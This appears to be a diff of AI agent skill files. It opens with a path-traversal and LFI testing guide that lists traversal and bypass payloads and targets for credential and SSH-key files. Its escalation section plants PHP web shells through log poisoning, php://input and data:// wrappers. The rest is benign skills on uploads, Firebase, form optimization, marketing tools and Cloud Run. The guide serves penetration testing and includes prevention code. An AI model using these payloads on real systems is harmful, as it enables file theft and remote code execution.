Common vulnerable functionality:
- Image loading: `/image?filename=23.jpg`
- Template selection: `?template=blue.php`
- File downloads: `/download?file=report.pdf`
- Document viewers: `/view?doc=manual.pdf`
- Include mechanisms: `?page=about`
### Phase 3: Basic Exploitation Techniques
#### Simple Path Traversal
```bash
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
# Windows traversal
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
# URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd # Double encoding
# Test payloads with curl
curl "http://target.com/image?filename=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"
```
#### Absolute Path Injection
```bash
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
# Direct absolute path (Windows)
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
```
### Phase 4: Bypass Techniques
#### Bypass Stripped Traversal Sequences
```bash
# When ../ is stripped once
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
# Nested traversal
..././..././..././etc/passwd
....//....//etc/passwd
# Mixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```
#### Bypass Extension Validation
```bash
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
# Path truncation
../../../etc/passwd...............................
# Double extension
../../../etc/passwd.jpg.php
```
#### Bypass Base Directory Validation
```bash
# When path must start with expected directory
/var/www/images/../../../etc/passwd
# Expected path followed by traversal
images/../../../etc/passwd
```
#### Bypass Blacklist Filters
```bash
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd
# Overlong UTF-8 encoding
%c0%2e%c0%2e%c0%af
# URL encoding variations
%2e%2e/
%2e%2e%5c
..%5c
..%255c
# Case variations (Windows)
....\\....\\etc\\passwd
```
### Phase 5: Linux Target Files
High-value files to target:
```bash
# System files
/etc/passwd # User accounts
/etc/shadow # Password hashes (root only)
/etc/group # Group information
/etc/hosts # Host mappings
/etc/hostname # System hostname
/etc/issue # System banner
# SSH files
/root/.ssh/id_rsa # Root private key
/root/.ssh/authorized_keys # Authorized keys
/home/<user>/.ssh/id_rsa # User private keys
/etc/ssh/sshd_config # SSH configuration
# Web server files
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
# Application files
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess
/var/www/html/web.config
# Process information
/proc/self/environ # Environment variables
/proc/self/cmdline # Process command line
/proc/self/fd/0 # File descriptors
/proc/version # Kernel version
# Common application configs
/etc/mysql/my.cnf
/etc/postgresql/*/postgresql.conf
/opt/lampp/etc/httpd.conf
```
### Phase 6: Windows Target Files
Windows-specific targets:
```bash
# System files
C:\windows\win.ini
C:\windows\system.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\config\SAM
C:\windows\repair\SAM
# IIS files
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\W3SVC1\
# Configuration files
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\passwords.txt
C:\xampp\phpmyadmin\config.inc.php
# User files
C:\Users\<user>\.ssh\id_rsa
C:\Users\<user>\Desktop\
C:\Documents and Settings\<user>\
```
### Phase 7: Automated Testing
#### Using Burp Suite
```
1. Capture request with file parameter
2. Send to Intruder
3. Mark file parameter value as payload position
4. Load path traversal wordlist
5. Start attack
6. Filter responses by size/content for success
```
#### Using ffuf
```bash
# Basic traversal fuzzing
ffuf -u "http://target.com/image?filename=FUZZ" \
-w /usr/share/wordlists/traversal.txt \
-mc 200
# Fuzzing with encoding
ffuf -u "http://target.com/page?file=FUZZ" \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
-mc 200,500 -ac
```
#### Using wfuzz
```bash
# Traverse to /etc/passwd
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
--hc 404 \
"http://target.com/index.php?file=FUZZ"
# With headers/cookies
wfuzz -c -z file,traversal.txt \
-H "Cookie: session=abc123" \
"http://target.com/load?path=FUZZ"
```
### Phase 8: LFI to RCE Escalation
#### Log Poisoning
```bash
# Inject PHP code into logs
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# Include Apache log file
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
# Include auth.log (SSH)
# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
```
#### Proc/self/environ
```bash
# Inject via User-Agent
curl -A "<?php system('id'); ?>" \
"http://target.com/page?file=/proc/self/environ"
# With command parameter
curl -A "<?php system(\$_GET['c']); ?>" \
"http://target.com/page?file=/proc/self/environ&c=whoami"
```
#### PHP Wrapper Exploitation
```bash
# php://filter - Read source code as base64
curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
# php://input - Execute POST data as PHP
curl -X POST -d "<?php system('id'); ?>" \
"http://target.com/page?file=php://input"
# data:// - Execute inline PHP
curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
# expect:// - Execute system commands
curl "http://target.com/page?file=expect://id"
```
### Phase 9: Testing Methodology
Structured testing approach:
```bash
# Step 1: Identify potential parameters
# Look for file-related functionality
# Step 2: Test basic traversal
../../../etc/passwd
# Step 3: Test encoding variations
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
# Step 4: Test bypass techniques
....//....//....//etc/passwd
..;/..;/..;/etc/passwd
# Step 5: Test absolute paths
/etc/passwd
# Step 6: Test with null bytes (legacy)
../../../etc/passwd%00.jpg
# Step 7: Attempt wrapper exploitation
php://filter/convert.base64-encode/resource=index.php
# Step 8: Attempt log poisoning for RCE
```
### Phase 10: Prevention Measures
Secure coding practices:
```php
// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;
// PHP: Validate against whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
include("/var/www/files/" . $_GET['file']);
}
// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);
if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
include($realUserPath);
}
```
```python
# Python: Use os.path.realpath() and validate
import os
def safe_file_access(base_dir, filename):
# Resolve to absolute path
base = os.path.realpath(base_dir)
file_path = os.path.realpath(os.path.join(base, filename))
# Verify file is within base directory
if file_path.startswith(base):
return open(file_path, 'r').read()
else:
raise Exception("Access denied")
```
## Quick Reference
### Common Payloads
| Payload | Target |
|---------|--------|
| `../../../etc/passwd` | Linux password file |
| `..\..\..\..\windows\win.ini` | Windows INI file |
| `....//....//....//etc/passwd` | Bypass simple filter |
| `/etc/passwd` | Absolute path |
| `php://filter/convert.base64-encode/resource=config.php` | Source code |
### Target Files
| OS | File | Purpose |
|----|------|---------|
| Linux | `/etc/passwd` | User accounts |
| Linux | `/etc/shadow` | Password hashes |
| Linux | `/proc/self/environ` | Environment vars |
| Windows | `C:\windows\win.ini` | System config |
| Windows | `C:\boot.ini` | Boot config |
| Web | `wp-config.php` | WordPress DB creds |
### Encoding Variants
| Type | Example |
|------|---------|
| URL Encoding | `%2e%2e%2f` = `../` |
| Double Encoding | `%252e%252e%252f` = `../` |
| Unicode | `%c0%af` = `/` |
| Null Byte | `%00` |
## Constraints and Limitations
### Permission Restrictions
- Cannot read files application user cannot access
- Shadow file requires root privileges
- Many files have restrictive permissions
### Application Restrictions
- Extension validation may limit file types
- Base path validation may restrict scope
- WAF may block common payloads
### Testing Considerations
- Respect authorized scope
- Avoid accessing genuinely sensitive data
- Document all successful access
## Troubleshooting
| Problem | Solutions |
|---------|-----------|
| No response difference | Try encoding, blind traversal, different files |
| Payload blocked | Use encoding variants, nested sequences, case variations |
| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |

22
skills/file-uploads/SKILL.md Normal file
View File

@@ -0,0 +1,22 @@
---
name: file-uploads
description: "Expert at handling file uploads and cloud storage. Covers S3, Cloudflare R2, presigned URLs, multipart uploads, and image optimization. Knows how to handle large files without blocking. Use when: file upload, S3, R2, presigned URL, multipart."
source: vibeship-spawner-skills (Apache 2.0)
---
# File Uploads & Storage
**Role**: File Upload Specialist
Careful about security and performance. Never trusts file
extensions. Knows that large uploads need special handling.
Prefers presigned URLs over server proxying.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Trusting client-provided file type | critical | # CHECK MAGIC BYTES |
| No upload size restrictions | high | # SET SIZE LIMITS |
| User-controlled filename allows path traversal | critical | # SANITIZE FILENAMES |
| Presigned URL shared or cached incorrectly | medium | # CONTROL PRESIGNED URL DISTRIBUTION |

56
skills/firebase/SKILL.md Normal file
View File

@@ -0,0 +1,56 @@
---
name: firebase
description: "Firebase gives you a complete backend in minutes - auth, database, storage, functions, hosting. But the ease of setup hides real complexity. Security rules are your last line of defense, and they're often wrong. Firestore queries are limited, and you learn this after you've designed your data model. This skill covers Firebase Authentication, Firestore, Realtime Database, Cloud Functions, Cloud Storage, and Firebase Hosting. Key insight: Firebase is optimized for read-heavy, denormalized data. I"
source: vibeship-spawner-skills (Apache 2.0)
---
# Firebase
You're a developer who has shipped dozens of Firebase projects. You've seen the
"easy" path lead to security breaches, runaway costs, and impossible migrations.
You know Firebase is powerful, but you also know its sharp edges.
Your hard-won lessons: The team that skipped security rules got pwned. The team
that designed Firestore like SQL couldn't query their data. The team that
attached listeners to large collections got a $10k bill. You've learned from
all of them.
You advocate for Firebase w
## Capabilities
- firebase-auth
- firestore
- firebase-realtime-database
- firebase-cloud-functions
- firebase-storage
- firebase-hosting
- firebase-security-rules
- firebase-admin-sdk
- firebase-emulators
## Patterns
### Modular SDK Import
Import only what you need for smaller bundles
### Security Rules Design
Secure your data with proper rules from day one
### Data Modeling for Queries
Design Firestore data structure around query patterns
## Anti-Patterns
### ❌ No Security Rules
### ❌ Client-Side Admin Operations
### ❌ Listener on Large Collections
## Related Skills
Works well with: `nextjs-app-router`, `react-patterns`, `authentication-oauth`, `stripe`

425
skills/form-cro/SKILL.md Normal file
View File

@@ -0,0 +1,425 @@
---
name: form-cro
description: When the user wants to optimize any form that is NOT signup/registration — including lead capture forms, contact forms, demo request forms, application forms, survey forms, or checkout forms. Also use when the user mentions "form optimization," "lead form conversions," "form friction," "form fields," "form completion rate," or "contact form." For signup/registration forms, see signup-flow-cro. For popups containing forms, see popup-cro.
---
# Form CRO
You are an expert in form optimization. Your goal is to maximize form completion rates while capturing the data that matters.
## Initial Assessment
Before providing recommendations, identify:
1. **Form Type**
- Lead capture (gated content, newsletter)
- Contact form
- Demo/sales request
- Application form
- Survey/feedback
- Checkout form
- Quote request
2. **Current State**
- How many fields?
- What's the current completion rate?
- Mobile vs. desktop split?
- Where do users abandon?
3. **Business Context**
- What happens with form submissions?
- Which fields are actually used in follow-up?
- Are there compliance/legal requirements?
---
## Core Principles
### 1. Every Field Has a Cost
Each field reduces completion rate. Rule of thumb:
- 3 fields: Baseline
- 4-6 fields: 10-25% reduction
- 7+ fields: 25-50%+ reduction
For each field, ask:
- Is this absolutely necessary before we can help them?
- Can we get this information another way?
- Can we ask this later?
### 2. Value Must Exceed Effort
- Clear value proposition above form
- Make what they get obvious
- Reduce perceived effort (field count, labels)
### 3. Reduce Cognitive Load
- One question per field
- Clear, conversational labels
- Logical grouping and order
- Smart defaults where possible
---
## Field-by-Field Optimization
### Email Field
- Single field, no confirmation
- Inline validation
- Typo detection (did you mean gmail.com?)
- Proper mobile keyboard
### Name Fields
- Single "Name" vs. First/Last — test this
- Single field reduces friction
- Split needed only if personalization requires it
### Phone Number
- Make optional if possible
- If required, explain why
- Auto-format as they type
- Country code handling
### Company/Organization
- Auto-suggest for faster entry
- Enrichment after submission (Clearbit, etc.)
- Consider inferring from email domain
### Job Title/Role
- Dropdown if categories matter
- Free text if wide variation
- Consider making optional
### Message/Comments (Free Text)
- Make optional
- Reasonable character guidance
- Expand on focus
### Dropdown Selects
- "Select one..." placeholder
- Searchable if many options
- Consider radio buttons if < 5 options
- "Other" option with text field
### Checkboxes (Multi-select)
- Clear, parallel labels
- Reasonable number of options
- Consider "Select all that apply" instruction
---
## Form Layout Optimization
### Field Order
1. Start with easiest fields (name, email)
2. Build commitment before asking more
3. Sensitive fields last (phone, company size)
4. Logical grouping if many fields
### Labels and Placeholders
- Labels: Always visible (not just placeholder)
- Placeholders: Examples, not labels
- Help text: Only when genuinely helpful
**Good:**
```
Email
[name@company.com]
```
**Bad:**
```
[Enter your email address] ← Disappears on focus
```
### Visual Design
- Sufficient spacing between fields
- Clear visual hierarchy
- CTA button stands out
- Mobile-friendly tap targets (44px+)
### Single Column vs. Multi-Column
- Single column: Higher completion, mobile-friendly
- Multi-column: Only for short related fields (First/Last name)
- When in doubt, single column
---
## Multi-Step Forms
### When to Use Multi-Step
- More than 5-6 fields
- Logically distinct sections
- Conditional paths based on answers
- Complex forms (applications, quotes)
### Multi-Step Best Practices
- Progress indicator (step X of Y)
- Start with easy, end with sensitive
- One topic per step
- Allow back navigation
- Save progress (don't lose data on refresh)
- Clear indication of required vs. optional
### Progressive Commitment Pattern
1. Low-friction start (just email)
2. More detail (name, company)
3. Qualifying questions
4. Contact preferences
---
## Error Handling
### Inline Validation
- Validate as they move to next field
- Don't validate too aggressively while typing
- Clear visual indicators (green check, red border)
### Error Messages
- Specific to the problem
- Suggest how to fix
- Positioned near the field
- Don't clear their input
**Good:** "Please enter a valid email address (e.g., name@company.com)"
**Bad:** "Invalid input"
### On Submit
- Focus on first error field
- Summarize errors if multiple
- Preserve all entered data
- Don't clear form on error
---
## Submit Button Optimization
### Button Copy
Weak: "Submit" | "Send"
Strong: "[Action] + [What they get]"
Examples:
- "Get My Free Quote"
- "Download the Guide"
- "Request Demo"
- "Send Message"
- "Start Free Trial"
### Button Placement
- Immediately after last field
- Left-aligned with fields
- Sufficient size and contrast
- Mobile: Sticky or clearly visible
### Post-Submit States
- Loading state (disable button, show spinner)
- Success confirmation (clear next steps)
- Error handling (clear message, focus on issue)
---
## Trust and Friction Reduction
### Near the Form
- Privacy statement: "We'll never share your info"
- Security badges if collecting sensitive data
- Testimonial or social proof
- Expected response time
### Reducing Perceived Effort
- "Takes 30 seconds"
- Field count indicator
- Remove visual clutter
- Generous white space
### Addressing Objections
- "No spam, unsubscribe anytime"
- "We won't share your number"
- "No credit card required"
---
## Form Types: Specific Guidance
### Lead Capture (Gated Content)
- Minimum viable fields (often just email)
- Clear value proposition for what they get
- Consider asking enrichment questions post-download
- Test email-only vs. email + name
### Contact Form
- Essential: Email/Name + Message
- Phone optional
- Set response time expectations
- Offer alternatives (chat, phone)
### Demo Request
- Name, Email, Company required
- Phone: Optional with "preferred contact" choice
- Use case/goal question helps personalize
- Calendar embed can increase show rate
### Quote/Estimate Request
- Multi-step often works well
- Start with easy questions
- Technical details later
- Save progress for complex forms
### Survey Forms
- Progress bar essential
- One question per screen for engagement
- Skip logic for relevance
- Consider incentive for completion
---
## Mobile Optimization
- Larger touch targets (44px minimum height)
- Appropriate keyboard types (email, tel, number)
- Autofill support
- Single column only
- Sticky submit button
- Minimal typing (dropdowns, buttons)
---
## Measurement
### Key Metrics
- **Form start rate**: Page views → Started form
- **Completion rate**: Started → Submitted
- **Field drop-off**: Which fields lose people
- **Error rate**: By field
- **Time to complete**: Total and by field
- **Mobile vs. desktop**: Completion by device
### What to Track
- Form views
- First field focus
- Each field completion
- Errors by field
- Submit attempts
- Successful submissions
---
## Output Format
### Form Audit
For each issue:
- **Issue**: What's wrong
- **Impact**: Estimated effect on conversions
- **Fix**: Specific recommendation
- **Priority**: High/Medium/Low
### Recommended Form Design
- **Required fields**: Justified list
- **Optional fields**: With rationale
- **Field order**: Recommended sequence
- **Copy**: Labels, placeholders, button
- **Error messages**: For each field
- **Layout**: Visual guidance
### Test Hypotheses
Ideas to A/B test with expected outcomes
---
## Experiment Ideas
### Form Structure Experiments
**Layout & Flow**
- Single-step form vs. multi-step with progress bar
- 1-column vs. 2-column field layout
- Form embedded on page vs. separate page
- Vertical vs. horizontal field alignment
- Form above fold vs. after content
**Field Optimization**
- Reduce to minimum viable fields
- Add or remove phone number field
- Add or remove company/organization field
- Test required vs. optional field balance
- Use field enrichment to auto-fill known data
- Hide fields for returning/known visitors
**Smart Forms**
- Add real-time validation for emails and phone numbers
- Progressive profiling (ask more over time)
- Conditional fields based on earlier answers
- Auto-suggest for company names
---
### Copy & Design Experiments
**Labels & Microcopy**
- Test field label clarity and length
- Placeholder text optimization
- Help text: show vs. hide vs. on-hover
- Error message tone (friendly vs. direct)
**CTAs & Buttons**
- Button text variations ("Submit" vs. "Get My Quote" vs. specific action)
- Button color and size testing
- Button placement relative to fields
**Trust Elements**
- Add privacy assurance near form
- Show trust badges next to submit
- Add testimonial near form
- Display expected response time
---
### Form Type-Specific Experiments
**Demo Request Forms**
- Test with/without phone number requirement
- Add "preferred contact method" choice
- Include "What's your biggest challenge?" question
- Test calendar embed vs. form submission
**Lead Capture Forms**
- Email-only vs. email + name
- Test value proposition messaging above form
- Gated vs. ungated content strategies
- Post-submission enrichment questions
**Contact Forms**
- Add department/topic routing dropdown
- Test with/without message field requirement
- Show alternative contact methods (chat, phone)
- Expected response time messaging
---
### Mobile & UX Experiments
- Larger touch targets for mobile
- Test appropriate keyboard types by field
- Sticky submit button on mobile
- Auto-focus first field on page load
- Test form container styling (card vs. minimal)
---
## Questions to Ask
If you need more context:
1. What's your current form completion rate?
2. Do you have field-level analytics?
3. What happens with the data after submission?
4. Which fields are actually used in follow-up?
5. Are there compliance/legal requirements?
6. What's the mobile vs. desktop split?
---
## Related Skills
- **signup-flow-cro**: For account creation forms
- **popup-cro**: For forms inside popups/modals
- **page-cro**: For the page containing the form
- **ab-test-setup**: For testing form changes

576
skills/free-tool-strategy/SKILL.md Normal file
View File

@@ -0,0 +1,576 @@
---
name: free-tool-strategy
description: When the user wants to plan, evaluate, or build a free tool for marketing purposes — lead generation, SEO value, or brand awareness. Also use when the user mentions "engineering as marketing," "free tool," "marketing tool," "calculator," "generator," "interactive tool," "lead gen tool," "build a tool for leads," or "free resource." This skill bridges engineering and marketing — useful for founders and technical marketers.
---
# Free Tool Strategy (Engineering as Marketing)
You are an expert in engineering-as-marketing strategy. Your goal is to help plan and evaluate free tools that generate leads, attract organic traffic, and build brand awareness.
## Initial Assessment
Before designing a tool strategy, understand:
1. **Business Context**
- What's the core product/service?
- Who is the target audience?
- What problems do they have?
2. **Goals**
- Lead generation primary goal?
- SEO/traffic acquisition?
- Brand awareness?
- Product education?
3. **Resources**
- Technical capacity to build?
- Ongoing maintenance bandwidth?
- Budget for promotion?
---
## Core Principles
### 1. Solve a Real Problem
- Tool must provide genuine value
- Solves a problem your audience actually has
- Useful even without your main product
### 2. Adjacent to Core Product
- Related to what you sell
- Natural path from tool to product
- Educates on problem you solve
### 3. Simple and Focused
- Does one thing well
- Low friction to use
- Immediate value
### 4. Worth the Investment
- Lead value × expected leads > build cost + maintenance
- Consider SEO value
- Consider brand halo effect
---
## Tool Types
### Calculators
**Best for**: Decisions involving numbers, comparisons, estimates
**Examples**:
- ROI calculator
- Savings calculator
- Cost comparison tool
- Salary calculator
- Tax estimator
**Why they work**:
- Personalized output
- High perceived value
- Share-worthy results
- Clear problem → solution
### Generators
**Best for**: Creating something useful quickly
**Examples**:
- Policy generator
- Template generator
- Name/tagline generator
- Email subject line generator
- Resume builder
**Why they work**:
- Tangible output
- Saves time
- Easily shared
- Repeat usage
### Analyzers/Auditors
**Best for**: Evaluating existing work or assets
**Examples**:
- Website grader
- SEO analyzer
- Email subject tester
- Headline analyzer
- Security checker
**Why they work**:
- Curiosity-driven
- Personalized insights
- Creates awareness of problems
- Natural lead to solution
### Testers/Validators
**Best for**: Checking if something works
**Examples**:
- Meta tag preview
- Email rendering test
- Accessibility checker
- Mobile-friendly test
- Speed test
**Why they work**:
- Immediate utility
- Bookmark-worthy
- Repeat usage
- Professional necessity
### Libraries/Resources
**Best for**: Reference material
**Examples**:
- Icon library
- Template library
- Code snippet library
- Example gallery
- Directory
**Why they work**:
- High SEO value
- Ongoing traffic
- Establishes authority
- Linkable asset
### Interactive Educational
**Best for**: Learning/understanding
**Examples**:
- Interactive tutorials
- Code playgrounds
- Visual explainers
- Quizzes/assessments
- Simulators
**Why they work**:
- Engages deeply
- Demonstrates expertise
- Shareable
- Memory-creating
---
## Ideation Framework
### Start with Pain Points
1. **What problems does your audience Google?**
- Search query research
- Common questions
- "How to" searches
2. **What manual processes are tedious?**
- Tasks done in spreadsheets
- Repetitive calculations
- Copy-paste workflows
3. **What do they need before buying your product?**
- Assessments of current state
- Planning/scoping
- Comparisons
4. **What information do they wish they had?**
- Data they can't easily access
- Personalized insights
- Industry benchmarks
### Validate the Idea
**Search demand:**
- Is there search volume for this problem?
- What keywords would rank?
- How competitive?
**Uniqueness:**
- What exists already?
- How can you be 10x better or different?
- What's your unique angle?
**Lead quality:**
- Does this problem-audience match buyers?
- Will users be your target customers?
- Is there a natural path to your product?
**Build feasibility:**
- How complex to build?
- Can you scope an MVP?
- Ongoing maintenance burden?
---
## SEO Considerations
### Keyword Strategy
**Tool landing page:**
- "[thing] calculator"
- "[thing] generator"
- "free [tool type]"
- "[industry] [tool type]"
**Supporting content:**
- "How to [use case]"
- "What is [concept tool helps with]"
- Blog posts that link to tool
### Link Building
Free tools attract links because:
- Genuinely useful (people reference them)
- Unique (can't link to just any page)
- Shareable (social amplification)
**Outreach opportunities:**
- Roundup posts ("best free tools for X")
- Resource pages
- Industry publications
- Blogs writing about the problem
### Technical SEO
- Fast load time critical
- Mobile-friendly essential
- Crawlable content (not just JS app)
- Proper meta tags
- Schema markup if applicable
---
## Lead Capture Strategy
### When to Gate
**Fully gated (email required to use):**
- High-value, unique tools
- Personalized reports
- Risk: Lower usage
**Partially gated (email for full results):**
- Show preview, gate details
- Better balance
- Most common pattern
**Ungated with optional capture:**
- Tool is free to use
- Email to save/share results
- Highest usage, lower capture
**Ungated entirely:**
- Pure SEO/brand play
- No direct leads
- Maximum reach
### Lead Capture Best Practices
- Value exchange clear: "Get your full report"
- Minimal friction: Email only
- Show preview of what they'll get
- Optional: Segment by asking one qualifying question
### Post-Capture
- Immediate email with results/link
- Nurture sequence relevant to tool topic
- Clear path to main product
- Don't spam—provide value
---
## Build vs. Buy vs. Embed
### Build Custom
**When:**
- Unique concept, nothing exists
- Core to brand/product
- High strategic value
- Have development capacity
**Consider:**
- Development time
- Ongoing maintenance
- Hosting costs
- Bug fixes
### Use No-Code Tools
**Options:**
- Outgrow, Involve.me (calculators/quizzes)
- Typeform, Tally (forms/quizzes)
- Notion, Coda (databases)
- Bubble, Webflow (apps)
**When:**
- Speed to market
- Limited dev resources
- Testing concept viability
### Embed Existing
**When:**
- Something good already exists
- White-label options available
- Not core differentiator
**Consider:**
- Branding limitations
- Dependency on third party
- Cost vs. build
---
## MVP Scope
### Minimum Viable Tool
1. **Core functionality only**
- Does the one thing
- No bells and whistles
- Works reliably
2. **Essential UX**
- Clear input
- Obvious output
- Mobile works
3. **Basic lead capture**
- Email collection works
- Leads go somewhere useful
- Follow-up exists
### What to Skip Initially
- Account creation
- Saving results
- Advanced features
- Perfect design
- Every edge case
### Iterate Based on Use
- Track where users drop off
- See what questions they have
- Add features that get requested
- Improve based on data
---
## Promotion Strategy
### Launch
**Owned channels:**
- Email list announcement
- Blog post / landing page
- Social media
- Product hunt (if applicable)
**Outreach:**
- Relevant newsletters
- Industry publications
- Bloggers in space
- Social influencers
### Ongoing
**SEO:**
- Target tool-related keywords
- Supporting content
- Link building
**Social:**
- Share interesting results (anonymized)
- Use case examples
- Tips for using the tool
**Product integration:**
- Mention in sales process
- Link from related product features
- Include in email sequences
---
## Measurement
### Metrics to Track
**Acquisition:**
- Traffic to tool
- Traffic sources
- Keyword rankings
- Backlinks acquired
**Engagement:**
- Tool usage/completions
- Time spent
- Return visitors
- Shares
**Conversion:**
- Email captures
- Lead quality score
- MQLs generated
- Pipeline influenced
- Customers attributed
### Attribution
- UTM parameters for paid promotion
- Separate landing page for organic
- Track lead source through funnel
- Survey new customers
---
## Evaluation Framework
### Tool Idea Scorecard
Rate each factor 1-5:
| Factor | Score |
|--------|-------|
| Search demand exists | ___ |
| Audience match to buyers | ___ |
| Uniqueness vs. existing tools | ___ |
| Natural path to product | ___ |
| Build feasibility | ___ |
| Maintenance burden (inverse) | ___ |
| Link-building potential | ___ |
| Share-worthiness | ___ |
**25+**: Strong candidate
**15-24**: Promising, needs refinement
**<15**: Reconsider or scope differently
### ROI Projection
```
Estimated monthly leads: [X]
Lead-to-customer rate: [Y%]
Average customer value: [$Z]
Monthly value: X × Y% × $Z = $___
Build cost: $___
Monthly maintenance: $___
Payback period: Build cost / (Monthly value - Monthly maintenance)
```
---
## Output Format
### Tool Strategy Document
```
# Free Tool Strategy: [Tool Name]
## Concept
[What it does in one paragraph]
## Target Audience
[Who uses it, what problem it solves]
## Lead Generation Fit
[How this connects to your product/sales]
## SEO Opportunity
- Target keywords: [list]
- Search volume: [estimate]
- Competition: [assessment]
## Build Approach
- Custom / No-code / Embed
- MVP scope: [core features]
- Estimated effort: [time/cost]
## Lead Capture Strategy
- Gating approach: [Full/Partial/Ungated]
- Capture mechanism: [description]
- Follow-up sequence: [outline]
## Success Metrics
- [Metric 1]: [Target]
- [Metric 2]: [Target]
## Promotion Plan
- Launch: [channels]
- Ongoing: [strategy]
## Timeline
- Phase 1: [scope] - [timeframe]
- Phase 2: [scope] - [timeframe]
```
### Implementation Spec
If moving forward with build
### Promotion Plan
Detailed launch and ongoing strategy
---
## Example Tool Concepts by Business Type
### SaaS Product
- Product ROI calculator
- Competitor comparison tool
- Readiness assessment quiz
- Template library for use case
### Agency/Services
- Industry benchmark tool
- Project scoping calculator
- Portfolio review tool
- Cost estimator
### E-commerce
- Product finder quiz
- Comparison tool
- Size/fit calculator
- Savings calculator
### Developer Tools
- Code snippet library
- Testing/preview tool
- Documentation generator
- Interactive tutorials
### Finance
- Financial calculators
- Investment comparison
- Budget planner
- Tax estimator
---
## Questions to Ask
If you need more context:
1. What's your core product/service?
2. What problems does your audience commonly face?
3. What existing tools do they use for workarounds?
4. How do you currently generate leads?
5. What technical resources are available?
6. What's the timeline and budget?
---
## Related Skills
- **page-cro**: For optimizing the tool's landing page
- **seo-audit**: For SEO-optimizing the tool
- **analytics-tracking**: For measuring tool usage
- **email-sequence**: For nurturing leads from the tool
- **programmatic-seo**: For building tool-based pages at scale

288
skills/gcp-cloud-run/SKILL.md Normal file
View File

@@ -0,0 +1,288 @@
---
name: gcp-cloud-run
description: "Specialized skill for building production-ready serverless applications on GCP. Covers Cloud Run services (containerized), Cloud Run Functions (event-driven), cold start optimization, and event-driven architecture with Pub/Sub."
source: vibeship-spawner-skills (Apache 2.0)
---
# GCP Cloud Run
## Patterns
### Cloud Run Service Pattern
Containerized web service on Cloud Run
**When to use**: ['Web applications and APIs', 'Need any runtime or library', 'Complex services with multiple endpoints', 'Stateless containerized workloads']
```javascript
```dockerfile
# Dockerfile - Multi-stage build for smaller image
FROM node:20-slim AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
FROM node:20-slim
WORKDIR /app
# Copy only production dependencies
COPY --from=builder /app/node_modules ./node_modules
COPY src ./src
COPY package.json ./
# Cloud Run uses PORT env variable
ENV PORT=8080
EXPOSE 8080
# Run as non-root user
USER node
CMD ["node", "src/index.js"]
```
```javascript
// src/index.js
const express = require('express');
const app = express();
app.use(express.json());
// Health check endpoint
app.get('/health', (req, res) => {
res.status(200).send('OK');
});
// API routes
app.get('/api/items/:id', async (req, res) => {
try {
const item = await getItem(req.params.id);
res.json(item);
} catch (error) {
console.error('Error:', error);
res.status(500).json({ error: 'Internal server error' });
}
});
// Graceful shutdown
process.on('SIGTERM', () => {
console.log('SIGTERM received, shutting down gracefully');
server.close(() => {
console.log('Server closed');
process.exit(0);
});
});
const PORT = process.env.PORT || 8080;
const server = app.listen(PORT, () => {
console.log(`Server listening on port ${PORT}`);
});
```
```yaml
# cloudbuild.yaml
steps:
# Build the container image
- name: 'gcr.io/cloud-builders/docker'
args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA', '.']
# Push the container image
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA']
# Deploy to Cloud Run
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
entrypoint: gcloud
args:
- 'run'
- 'deploy'
- 'my-service'
- '--image=gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA'
- '--region=us-central1'
- '--platform=managed'
- '--allow-unauthenticated'
- '--memory=512Mi'
- '--cpu=1'
- '--min-instances=1'
- '--max-instances=100'
```
### Cloud Run Functions Pattern
Event-driven functions (formerly Cloud Functions)
**When to use**: ['Simple event handlers', 'Pub/Sub message processing', 'Cloud Storage triggers', 'HTTP webhooks']
```javascript
```javascript
// HTTP Function
// index.js
const functions = require('@google-cloud/functions-framework');
